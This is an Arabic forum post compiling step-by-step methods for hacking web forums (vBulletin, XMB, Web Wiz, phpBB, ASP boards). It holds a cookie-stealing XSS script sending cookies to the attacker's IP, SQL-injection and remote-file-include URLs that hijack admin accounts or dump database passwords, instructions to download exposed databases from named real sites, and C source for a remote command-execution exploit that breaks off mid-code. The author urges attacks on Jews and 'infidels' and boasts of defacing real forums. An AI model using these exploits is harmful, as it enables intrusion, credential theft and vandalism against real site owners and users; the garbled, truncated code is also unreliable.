منتــــديات الفريق العراقي

اهلا وسهلا بالزائرين الكرام .... اخي الزائر الكريم نرجو ان تكون في تمام الصحة والعافية كما نتشرف في ان تكون احد اعضاء..الفريق العراقي ...☺️

انضم إلى المنتدى ، فالأمر سريع وسهل

منتــــديات الفريق العراقي

اهلا وسهلا بالزائرين الكرام .... اخي الزائر الكريم نرجو ان تكون في تمام الصحة والعافية كما نتشرف في ان تكون احد اعضاء..الفريق العراقي ...☺️

منتــــديات الفريق العراقي

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
منتــــديات الفريق العراقي

كل ماتحتاجه من برامج وبحوث وافلام ومسلسلات فقط هنا

مواضيع مماثلة

المواضيع الأخيرة

» نتائج الدور الثالث للسادس الاعدادي والثالث المتوسط
طرق اختراق المواقع I_icon_minitimeالأربعاء أكتوبر 31, 2012 2:09 am من طرف ابراهيم العبيدي

» نتائج الدور الثالث للسادس الاعدادي والثالث المتوسط
طرق اختراق المواقع I_icon_minitimeالأربعاء أكتوبر 31, 2012 2:08 am من طرف ابراهيم العبيدي

» اعظم اسطوانة تعاريف شاملة DriverPack Solution 12.3 Lite
طرق اختراق المواقع I_icon_minitimeالجمعة سبتمبر 07, 2012 6:02 am من طرف امير الحزن

» روابط الاستمارة الالكترونية 2012/2013
طرق اختراق المواقع I_icon_minitimeالجمعة سبتمبر 07, 2012 4:39 am من طرف ابراهيم العبيدي

» اسئلة امتحان طلبة السادس الاسلامي حصريا
طرق اختراق المواقع I_icon_minitimeالأحد أغسطس 12, 2012 6:00 am من طرف ابراهيم العبيدي

» مسلسل بقايا حب
طرق اختراق المواقع I_icon_minitimeالخميس أغسطس 09, 2012 6:48 pm من طرف ابراهيم العبيدي

» مسلسل لعنة القسم
طرق اختراق المواقع I_icon_minitimeالخميس أغسطس 09, 2012 6:45 pm من طرف ابراهيم العبيدي

» مسلسل الزوجة الرابعة
طرق اختراق المواقع I_icon_minitimeالخميس أغسطس 09, 2012 6:42 pm من طرف ابراهيم العبيدي

» مسلسل باب الخلق
طرق اختراق المواقع I_icon_minitimeالخميس أغسطس 09, 2012 6:39 pm من طرف ابراهيم العبيدي

الفريق العراقي

لوحة الشرف لي هذا الاسبوع






أفضل 10 أعضاء في هذا المنتدى

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 

احصائيات

أعضاؤنا قدموا 276 مساهمة في هذا المنتدى في 229 موضوع

هذا المنتدى يتوفر على 62 عُضو.

آخر عُضو مُسجل هو ازاد الكوردي فمرحباً به.


    طرق اختراق المواقع

    avatar
    ????
    زائر


    طرق اختراق المواقع Empty طرق اختراق المواقع

    مُساهمة من طرف ???? الخميس مايو 12, 2011 4:00 pm

    جميع طرق إختراق المنتديات + ثغرات جديدة وخطيرة

    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الحمد لله رب العالمين و أفضل الصلاة و أتم التسليم على سيدنا محمد
    صلى الله عليه وعلى آله وصحبه أجمعين أما بعد
    :
    السلام عليكم ورحمة الله وبركاته :
    هذا الموضوع يحتوي على معلومات كثيرة ومفيدة لكل الهاكرز وبجميع
    مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء
    إخوانكم في الدين

    ولكن أرجوا أن تستخدموها ضد اليهود وكفار و الرتدين

    أولا سم بالله وابدأ :
    بسم الله الرحمن الرحيم


    جميع طرق اختراق المنتديات


    ---------
    مقدمة
    :
    ---------

    الموضوع : اختراق الـ vBulletin
    المتطلبات
    : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
    المستوى : متوسط

    ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !!
    يمكن ان تجربها على انواع اخرى من المنتديات
    .


    ----------
    الثغرة
    :
    ---------

    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي
    تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل

    بيانات من مكان خاطيء .. لكن يشترط ان يسمح
    المنتدى بأكواد الـ

    HTML ..

    قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب
    اي موضوع والصق بين السطور هذا الكود
    :
    <script>document.write('<img
    src="http://my_ip_address/'+document.*****e+'">';</script>

    مع ملاحظة تغير الـ IP Adress الى رقم الـ
    IP الخاص بك
    .

    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه
    سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء

    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم
    يقوم السكربت بتحويل هذه السطور الى رقم

    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على
    جهازي سيرفر مثل

    IIS او
    Apache او غيرها
    ) .

    وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

    ابحث عن الكود الخاص بالباسورد .. مثال :

    GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb








    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f8;%20bbthreadview[54








    20]=1012444064;%20bblastvi
    sit=1011983161

    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password
    hash]
    ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى
    (الذي سرقت منه الكوكيز
    )
    ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى
    (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص

    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها
    تستطيع استقبال بريد يحتوي باسورد الادمن
    ..

    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم
    وافعل ما تشاء
    ..
    !

    ------------
    الحل
    -----------

    للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع +
    التقويم
    + ... )
    (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

    كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا
    وضعت
    <img>
    او <Demon>
    او
    اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا
    واغلق هذه المنافذ

    .
    Be Secret .. Dont' be Lamer .

    تاريخ اكتشاف الثغرة : 31 - 1 - 2002
    تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


    أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم
    العرب والمسلمين




    ======================================
    إختراق منتديات VP
    ======================================
    اختراق المنتديات بس بمنتديات vb

    . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

    2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

    3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

    أو العنوان التفصيلي التالي :
    http://URL/memberlist.php


    URL = العنوان المستضيف للمنتدى

    مثل
    = - .com

    4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل
    بالأعلي في مستطيل العناوين
    address bar .

    سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

    http://URL/member.php?soitgoe68e45u...info&userid=266


    هذا العنوان الطويل يعني = عرض بيانات
    المستخدم رقم 266


    5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

    http://URL/member.php?soitgoe68e45u...etinfo&userid=1


    العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

    (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

    أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

    6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

    http://URL/member.php?action=login&...VALIDPASS&url=');'.$use
    rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+ WH E
    RE+username='ADMIN'').'

    العنوان هذا ستقوم بتغيير الكلمات التالية

    URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = أسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    YOUR@EMAIL.HERE
    = البريد الذي سجلت به بالمنتدى
    ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

    7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة
    مرات
    ******* .

    8. ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر
    خاطئة ( يجب أن تكون خاطئة
    ) .

    بالطيع ستظهر لك الصفحة التعيسة التي تقول :

    أنت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password


    9. بكل بساطة أضغط على

    نسيت كلمة السر
    forgot password

    والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

    10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

    ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة
    يعني لا تستطيع فعلها إلا مع منتديات اليوم


    ======================================
    إختراق منتديات xmb
    ======================================
    تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من
    الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على
    وجه الأرض الا الله عز وجل
    ..

    وصف للثغره::

    وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان
    تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر


    الأصدار المصاب:::
    XMB 1.6 Magic Lantern Final

    الشرح والتطبيق:::
    جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:

    1- عليك بالذهاب الى موقع جو http://www.google.com/
    2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
    3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
    لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
    4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
    index_log.log يعني راح يكون متل هدا
    http://www.******.com/massegboard/index_log.log

    5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
    المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
    6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع

    وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
    7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
    هذا مثلا::

    xmbuser=admin
    واباس راح تلقاه قدامه مثل هذا
    xmbpw=1faeb6747a31c854800ddf3c62b1717a
    8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
    CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe



    ======================================
    إختراق منتديات Web Wiz Guide
    ======================================
    مث http://host.basharnet.com/forum
    هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير
    تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن
    الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى

    أغلب المنتديات مصابة بهذه الثغرة


    بسم الله الرحمن الرحيم

    الشرح: ثغرة تصيب منتديات Web Wiz Guide

    أولا إذهب إلى google
    اكتب
    Web Wiz forum

    وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى
    واكتب بعد
    forum
    admin/ww*******mdb

    حمل الملف وادخل عليه عن طريق microsoft office access

    بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

    سجل اسمك والباسوورد

    الآن أنت في لوحة التحكم
    ها ها ها ها
    بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها
    أنا

    هذا منتدى قمت باختراقه لاحقا
    http://www.plasticcube.com/Forum/default.asp

    اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
    وهي منندى ثان
    هذا منتدى دينيماركي
    http://www.naturklub.dk/forum/



    ثغرة في معظم منتديات الـ asp

    ++++++++++++++++++++++++++
    سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
    وعليها فقس
    طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد
    بياناتها
    .

    بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية
    لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها
    لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما
    يكروسوفت الا اذا لم يوجد له بديل ...الخ

    وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
    sqlserver && sql && M.S Access

    واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات
    بحيث انك اذا وجدت امتدادا واسم قاعدة البانات
    فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر
    وبدون تشفير أيضا

    .

    واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي
    باسم
    philboard.asp

    مثل هذا المنت http://www.khill.co.uk/forum/philboard.asp
    وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث
    عن

    -------------- > philboard وانتظر النتائج ....

    -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    كيف تحمل قاعدة البيانات ؟
    اكتب هذا الامتداد
    وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم
    قاعدة البيانات صغير جدا للتطبيق والتسليم
    بسرعة

    وهذا هو امتداد واسم قاعدة
    البيانات لقاعدة البيانات

    database/philboard.mdb
    وتكتبه بعد اسم الموقع والمنتدى مثل
    http://www.khill.co.uk/forum/database/philboard.mdb


    ولا بد لكي تقرا قاعدة البيانات
    ان يكون في جهازك برنامج ما يكروسوفت أكسس

    وبعد فتح قاعدة البيانات ستجد
    بداخلها عدة جداول فيها جميع محتويات قاعدة
    البيانات

    من ضمنها وهو المهم جدول المستخدمين ال users
    وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد

    الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
    لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف
    العام


    philboard_admin.asp وهذا عنوانها
    مثال
    http://www.khill.co.uk/forum/philboard_admin.asp


    ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
    احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
    hacked by xxxxxxxxxx
    xxxxxxx يعني اسمك
    ,,,

    من وين ؟

    من المربعين الموجودة بالاسفل في لوحة التحكم
    اكتب في المستطيل hacked by xxxxxxxxxx
    وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
    واضغط
    add يعني اضافة

    ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق
    لك


    والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير
    اسمها . فكما راينا ان منتديات
    philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد

    __________________________________________________

    تفضلو ثغرة في هاك الرد السريع منتدى PHPBB

    عند تركيبك لهاك الرد السريع
    سوف تجد هذا الكود


    if ( $mode == 'smilies' )
    {
    define('IN_PHPBB', true);
    include($phpbb_root_path . 'extension.inc');
    include($phpbb_root_path . 'common.'.$phpEx);
    include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
    generate_smilies('window', PAGE_POSTING);
    exit;
    }



    دقق جيدا بهذا الكود
    ثم أنشاء ملف جديد سمه extension.inc

    وضع داخلها مثلا
    شفرة

    <?php
    include('config'.'.php');
    echo "DB Type: $dbms <br>";
    echo "DB Host: $dbhost <br>";
    echo "DB Name: $dbname <br>";
    echo "DB User: $dbuser <br>";
    echo "DB Pass: $dbpasswd <br>";
    exit;
    ?>



    يمكنك وض الخيارات التي تود مشاهدتها من الهاك

    الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
    أتجه الى هذا العنوان

    URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
    Server]/&mode=smiles

    بسهولة أستبدل [phpBB_Forum]
    بعنوان المنتدى المستهدف
    [Your Server]
    بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به

    ماذا ترى؟؟؟
    معلومات قاعدة البيانات بين ايديك


    الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :

    ببساطة أفتح الملف quick_reply.php
    أبحث عن
    if ( $mode == 'smilies' )
    أَضف بعدها مباشرة
    phpbb_root_path = "./";

    وانشاءالله انحلت المشكلة


    _________________




    ثغره جديده في منتديات الvb
    ________________________
    أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه
    الله


    لكن هذي كانت على النسخة التجريبية Beta

    بالنسبة للثغرة فهي واضحة
    وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب
    الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك


    طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
    http://[victim]/forum/private.php




    PHP:

    --------------------------------------------------------------------------------



    From: Ferruh Mavituna
    Subject: VBulletin Preview Message&nbs
    p;- XSS Vuln


    ---------------------------------------
    ---------------
    VBulletin Private Message&nbs
    p;"Preview
    Message" XSS Vulnerability
    ---------------------------------------
    ---------------
    Any kind of XSS att
    acks possibility.

    -----------------------------------------------------
    -
    About VBulletin;
    -----------------------------------------------------
    -
    PHP Based Popular Forum&
    nbsp;Application
    Vendor & Demo;
    <a href="http://www.vbulletin.com/"
    target="_blank"><a href="http://www.vbulletin.com/"
    target="_blank"& http://www.vbulletin.com/</a></a>;

    ---------------------------------------
    ---------------
    Vulnerable;
    -----------------------------------------------------
    -
    vBulletin 3.0.0 Beta 2
    <
    br />vBulletin 2.x
    ---------------------------------------
    ---------------

    -----------------------------------------------------
    -
    Vendor Status;
    -----------------------------------------------------
    -
    I can not contact v
    endor for this issue ! No patch available at&nb
    sp;the moment;

    -----------------------------------------------------
    -
    Solution;
    -----------------------------------------------------
    -
    HTML Encoding like post&
    nbsp;thread preview page;

    -----------------------------------------------------
    -
    Exploit Code;
    -----------------------------------------------------
    -
    <html>
    <body>
    <form action="http://[victim]/forum/private.php"&nbs
    p;method="post"
    name="vbform">
    <input type="hidden" name="do"
    value="insertpm" />
    <input type="hidden" name="pmid" value=""
    />
    <input type="hidden" name="forward" value=""
    />
    <input type="hidden" name="receipt" value="0"
    />

    <input type="text" class="bginput"
    name="title" value="" size="40"
    tabindex="2" />
    <textarea name="message" rows="20" cols="70"
    wrap="virtual"
    tabindex="3"></textarea>
    <input type="submit" class="button"
    name="sbutton" value="Post
    Message"
    accesskey="s" tabindex="4" />
    <input type="submit" class="button" value="Preview
    Message" accesskey="p"
    name="preview" onclick="this.form.dopreview = true; return
    true;this.form.submit()" tabindex="5" >

    <input type="checkbox" name="savecopy"
    value="1" id="cb_savecopy"
    checked="checked" />
    <input type="checkbox" name="signature"
    value="1" id="cb_signature" />
    <input type="checkbox" name="parseurl"
    value="1" id="cb_parseurl"
    checked="checked" />
    <input type="checkbox" name="disablesmilies"
    value="1"
    id="cb_disablesmilies" />
    </form>
    <script>
    //Set Values and Submit
    // You
    can write your own JS codes
    var xss = ""><script>alert(document.coo
    kie)</script>";
    document.vbform.title.value=xss;
    document.vbform.preview.click();
    </script>
    </body>
    </html>


    *You may need login first


    Ferruh Mavituna
    Web Application Security
    Consultant
    Freelance Developer & Designer
    <a href="http://ferruh.mavituna.com"
    target="_blank"><a href="http://ferruh.mavituna.com"
    target="_blank"& http://ferruh.mavituna.com/</a></a>;


    fares125@hotmail.com


    --------------------------------------------------------------------------------


    ثغره جميله لاختراق منتيات الفورم
    ____________________________
    طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .

    وامتدادها تكون . . .
    admin/ww*******mdb

    http://www./###.com/forum
    تصبح
    . . .
    http://www./###.com/forum/admin/ww*******mdb



    طريقه البحث عن الثغره . . . .
    http://www.google.com/
    وتبحث عن
    Web Wiz forum

    ويمكنك كتابه
    Web Wiz forum 1
    Web Wiz forum 2.1

    __________________________________________________
    ___________
    ثغرة في منتديات vBulletin في ملفcalendar.php
    _ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
    تأكد من وجود ملف calendar.php
    إذا كان موجود إدخل هذا العنوان
    http://www.example.com/vb/calendar....mma=";echo'';%20echo%20%60<command>%20
    %60;die();echo%22
    المتغيرات
    1-example.com بإسم الموقع
    2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd



    ______________________________________________





    اصحاب القبعة البيضاء




    the sniper
    عرض الملف الشخصي الخاص بالعضو
    إرسال رسالة خاصة إلى the sniper
    قم بزيارة الصفحة الشخصية لـ the sniper !
    إيجاد المزيد من المشاركات لـ the sniper
    إضافة
    the sniper إلى قائمة الأصدقاء لديك

    01-17-2005, 10:18 AM رقم المشاركة : 2
    the sniper
    عضو



    الملف الشخصي






    ثغرة
    vBulletin
    -------------------------------------------------------------------
    Within the first few lines of code in memberlist.php, the variable $letterbits is
    evaluated. Because of the way PHP initializes variables, we can inject HTML or
    JavaScript into the document. So by directing a user to, for example:

    http://vulnerable/forum/memberlist....E********='
    http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


    2Ephp%3F****%3D%27%2B
    escape%28document%2E*****e%29%3C%2Fscript%3E
    (NOTE: The URL should be on a one line)

    You can steal the user's password hash and user id. Because of the way
    vBulletin parses URLs, the above will not function inside the forum, but if we
    put this in an off-site html file:
    <script>
    ******** = "http://www.vbulletin.com/forum/memb...t%3E********%3D
    %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


    rd%2Ephp%3F****%3D%27
    %2Bescape%28document%2E*****e%29%3C%2Fscript%3E"
    </script>
    And then link to it instead, the exploit will work as intended. The user
    doesn't even have to be aware of what has transpired, the above link will
    proceed first to the memberlist w/*****e stealing code, and then
    http://www.swgmotu.com./

    With the recorded user id and password hash, we can access the site:
    http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password
    hash]
    -----------------------------------------------------------------------------------


    منقول من موقع امريكي



    ___________________________________
    ثغرة
    vbulletin2

    gosper is credited with disclosing this to securiteam on 9-24-02 along with a
    working exploit and he probably discovered it too. I wrote this because his
    exploit didn't URL encode all the characters that needed to be URL encoded
    in order for some of the inputted commands to work properly. I added a date
    argument which is essential for exploiting the security hole. I also used an
    fdopen() and fgets() to make sure all the output was recieved and displayed
    correctly, at least I hope it works better . Last thing I built in was HTTP
    version 1.1 support so that you can use this against virtual hosts. Yeah... and

    you can exploit this with a web browser too, its just easier to use this
    program,
    most of the time.

    Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
    End of Days, sk3tch and all the people in #ozan http://www.ozane.net/). If I
    forgot you, well shit.

    Compile: gcc vbcal.c -o vbcal
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <signal.h>
    #include <unistd.h>

    #define url1 "calendar.php?calbirthdays=1&action=getday&day
    ="
    #define url2 "&comma=%22;echo%20'';%20echo%20%60"
    #define url3 "%60;die();echo%22"

    void time_out(void)
    {
    printf("\ntimed out on connect()\n");
    exit(0);
    }

    void usage (char *prog)
    {
    printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port]
    [-t timeout] [-v (verbose)]\n\n", prog);
    printf("\t The -h and -d arguments are required, the rest are
    optional.");
    printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14
    2002.");
    printf("\n\t date must also be a date on the vBulletin board that has an
    event on it.\n");
    printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you
    probably used a date without an event on it.");
    printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
    printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20
    -v\n\n", prog);
    exit(0);
    }


    int main(int argc, char *argv[])
    {
    int c, x, sockfd, verbose = 0;
    int timeout = 10; /* timeout for connection */
    int port = 80; /* 80 default for HTTPD */
    char *path = "/"; /* url path, default = "/" */
    char *host = NULL, *date = NULL;
    char sign = '%';
    char *prog;
    char tmp[2];
    char tmp2[4];
    char cmd_buf[501];
    char encoded_cmd[501];
    char data[1024];
    char output[20480]; /* 20k recv buf */
    struct sockaddr_in addr;
    struct hostent *he;
    struct sigaction action;
    FILE *f;

    memset(&tmp, '\0', sizeof(tmp));
    memset(&tmp2, '\0', sizeof(tmp2));
    memset(&cmd_buf, '\0', sizeof(cmd_buf));
    memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
    memset(&data, '\0', sizeof(data));
    memset(&output, '\0', sizeof(output));

    prog = argv[0];

    fprintf(stderr, "\t ---[ vb_cal.c\n");
    fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar
    exploit\n");
    fprintf(stderr, "\t ---[ c0ded by st0ic\n");
    fprintf(stderr, "\t -- http://www.fsix.net/n");

    if (argc < 5 || argc > 12)
    usage(prog);


    while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 )
    {
    switch(c)
    {
    case 'h': /* host */
    {
    host = optarg;
    break;
    }
    case 'd':
    {
    date = optarg;
    break;
    }
    case 'u': /* url path */
    {
    path = optarg;
    break;
    }
    case 'p': /* port */
    {
    port = atoi(optarg);
    break;
    }
    case 't': /* connect timeout */
    {
    timeout = atoi(optarg);
    break;
    }
    case 'v':
    {
    verbose = 1;
    break;
    }
    default:
    usage(prog);
    }
    }
    /* make sure we got the required stuff */
    if (host == NULL)
    usage(prog);
    else if (date == NULL)
    usage(prog);

    if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
    perror("socket()");
    exit(1);
    }

    if ( (he = gethostbyname(host)) == NULL)
    {
    perror("gethostbyname()");
    exit(1);
    }
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr = *( (struct in_addr *)he->h_addr);
    addr.sin_port = htons(port);

    bzero(&action, sizeof(action));
    action.sa_handler = (void *)time_out;
    action.sa_flags = 0;
    sigaction(SIGALRM, &action, 0);

    alarm(timeout);
    if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
    perror("connect()");
    exit(1);
    }
    alarm(0);
    printf("\\q to exit cmd prompt\n");
    while(1)
    {
    printf("cmd> ");
    fgets(cmd_buf, sizeof(cmd_buf), stdin);
    for (x = 0; x < strlen(cmd_buf); x++)
    if (cmd_buf[x] == '\n')
    cmd_buf[x] = '\0';

    if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
    exit(0);


    for (x = 0; x < strlen(cmd_buf); x++)
    {
    tmp[0] = cmd_buf[x];
    /* 0 - 9 */
    if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* A - Z */
    else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* a - z */
    else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* everything not a letter or number */
    else
    {
    snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
    strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
    }
    }
    /* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
    snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost:
    %s\n\n", path, url1,
    date, url2, encoded_cmd, url3, host);
    /* be verbose about the string we're sending in case we need to debug. */
    if (verbose == 1)
    printf("\nSending: %s", data);

    send(sockfd, data, sizeof(data), 0);

    if ( (f = fdopen(sockfd, "r+") ) == NULL)
    {
    perror("fdopen()");
    exit(1);
    }
    while(1)
    {
    fgets(output, sizeof(output), f);
    if (feof(f) != 0)
    break;
    else
    printf("%s", output);
    memset(&output, '\0', sizeof(output));
    }

    memset(&cmd_buf, '\0', sizeof(cmd_buf));
    memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
    memset(&data, '\0', sizeof(data));
    memset(&output, '\0', sizeof(output));

    fclose(f);

    if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
    perror("socket()");
    exit(1);
    }
    alarm(timeout);
